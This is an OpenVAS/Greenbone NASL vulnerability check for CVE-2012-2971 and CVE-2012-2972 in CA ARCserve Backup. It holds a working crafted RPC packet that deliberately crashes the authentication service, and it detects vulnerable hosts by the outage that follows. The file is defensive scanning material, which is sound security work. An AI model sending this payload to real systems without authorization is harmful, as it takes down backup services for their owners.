# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
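if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802677");
  script_version("2023-09-08T05:06:21+0000");
  script_cve_id("CVE-2012-2971", "CVE-2012-2972");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-09-08 05:06:21 +0000 (Fri, 08 Sep 2023)");
  script_tag(name:"creation_date", value:"2012-11-20 11:04:50 +0530 (Tue, 20 Nov 2012)");
  script_name("CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows");

  # ACT_DENIAL: this check is intrusive. It sends a crafted request to the
  # ARCserve authentication service and reports when the service stops
  # accepting connections afterwards, i.e. it crashes the service on purpose.
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Denial of Service");

  # The portmapper port discovered by gb_rpc_portmap_tcp_detect.nasl is the
  # starting point; the authentication service port is looked up from it.
  script_dependencies("gb_rpc_portmap_tcp_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("rpc/portmap/tcp/detected", "Host/runs_windows");

  script_xref(name:"URL", value:"http://secunia.com/advisories/51012/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56116");
  script_xref(name:"URL", value:"http://www.offensive-security.com/vulndev/ca-arcserve-rwslist-remote-code-execution/");
  script_xref(name:"URL", value:"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={F9EEA31E-8089-423E-B746-41B5C9DD2AC1}");

  # Wording fix: the original text read "will remote attackers to execute".
  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute arbitrary code or
  cause a denial of service condition.");

  script_tag(name:"affected", value:"CA ARCserve Backup for Windows r12.5, r15, r16.");

  script_tag(name:"insight", value:"The flaws are due to an error in the RPC service, which fails to validate
  user supplied crafted input.");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_tag(name:"summary", value:"CA ARCserve Backup is prone to multiple vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}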
include("rpc.inc");
include("http_func.inc");
include("host_details.inc");
include("byte_func.inc");
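RPC_PROG = "100000";

# TCP portmapper (RPC program 100000) as recorded by gb_rpc_portmap_tcp_detect.nasl.
port = rpc_get_port(program: RPC_PROG, protocol: IPPROTO_TCP);
if(!port) exit(0);

# PMAPPROC_GETPORT call (RPC v2, program 100000 version 2, procedure 3,
# AUTH_NULL credentials/verifier) asking for program 0x00060980 version 1
# over TCP (protocol 6). The ARCserve authentication service registers under
# that program number; a successful reply carries its port in the last bytes.
req_getport = raw_string(
  0x80, 0x00, 0x00, 0x38, 0x4f, 0x9d, 0xb4, 0xb2, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xa0, 0x00, 0x00, 0x00, 0x02,
  0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x09, 0x80,
  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00);

# The original code called send() on an unchecked socket; bail out if the
# portmapper cannot be reached.
soc = open_sock_tcp(port);
if(!soc) exit(0);

send(socket:soc, data:req_getport);
res = recv(socket:soc, length:100);
close(soc);

if(isnull(res)) exit(0);

# We index the reply from its end, so it must hold at least the bytes we
# read; without this guard a short reply would produce a negative index.
reslen = strlen(res);
if(reslen < 4) exit(0);

# Authentication service port = last two bytes of the reply (big-endian).
# A port of 0 means the program is not registered. If the portmapper sent an
# error reply instead, the trailing bytes are a status word rather than a
# port; the connect() below then fails and nothing is reported.
authport = hex2dec(xvalue:hexstr(res[reslen-2]) + hexstr(res[reslen-1]));
if(authport < 1) exit(0);

# Crafted request for the authentication service. Where the service expects
# an xdr_list, an xdr_string is sent instead; an unpatched service does not
# validate this and crashes.
dos = raw_string(
  0x80, 0x00, 0x02, 0x68, 0x4f, 0x9d, 0x17, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x02, 0x00, 0x06, 0x09, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x7a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa1, 0x02, 0x35, 0x32, 0x35,
  0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x41,
  0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x31) + crap(data:raw_string(0x30), length:98) + raw_string(
  0x34, 0x45, 0x38, 0x44, 0x44, 0x31, 0x36, 0x34, 0x44, 0x33, 0x41, 0x37, 0x31,
  0x42, 0x39, 0x43, 0x36, 0x46, 0x34, 0x43, 0x46, 0x42, 0x41, 0x42, 0x34, 0x32,
  0x35, 0x35, 0x42, 0x44, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x02,
  0x35, 0x32, 0x35, 0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x30, 0x41, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30,
  0x30, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30) +
  crap(data:raw_string(0x30), length:89) + raw_string(
  0x46, 0x30, 0x38, 0x30, 0x31, 0x43, 0x42, 0x41, 0x37, 0x38, 0x37, 0x36, 0x44,
  0x46, 0x30, 0x45, 0x44, 0x41, 0x44, 0x31, 0x36, 0x44, 0x43, 0x38, 0x36, 0x36,
  0x38, 0x39, 0x37, 0x33, 0x43, 0x31, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41,
  ## xdr_list was expected here, we replace it with
  ## an xdr_string to trigger the bug
  0x00, 0x00, 0x00, 0x06, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x00,
  ## string
  0x00, 0x00, 0x00, 0x17, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x00);

# Baseline: the service must accept a connection before the request is
# sent, otherwise a later connection failure proves nothing.
soc2 = open_sock_tcp(authport);
if(!soc2) exit(0);

send(socket:soc2, data:dos);
recv(socket:soc2, length:100);  # drain any reply; its content is not used
close(soc2);

# Give the crash time to take effect before re-probing.
sleep(15);

# The service answered a connection a moment ago; if it refuses one now, the
# crafted request took it down. Report on the port that actually went down
# (the authentication service), not on the portmapper we started from.
soc3 = open_sock_tcp(authport);
if(!soc3) {
  security_message(port:authport, protocol:"tcp");
  exit(0);
}
close(soc3);

# Service survived the request: tested and not vulnerable.
exit(99);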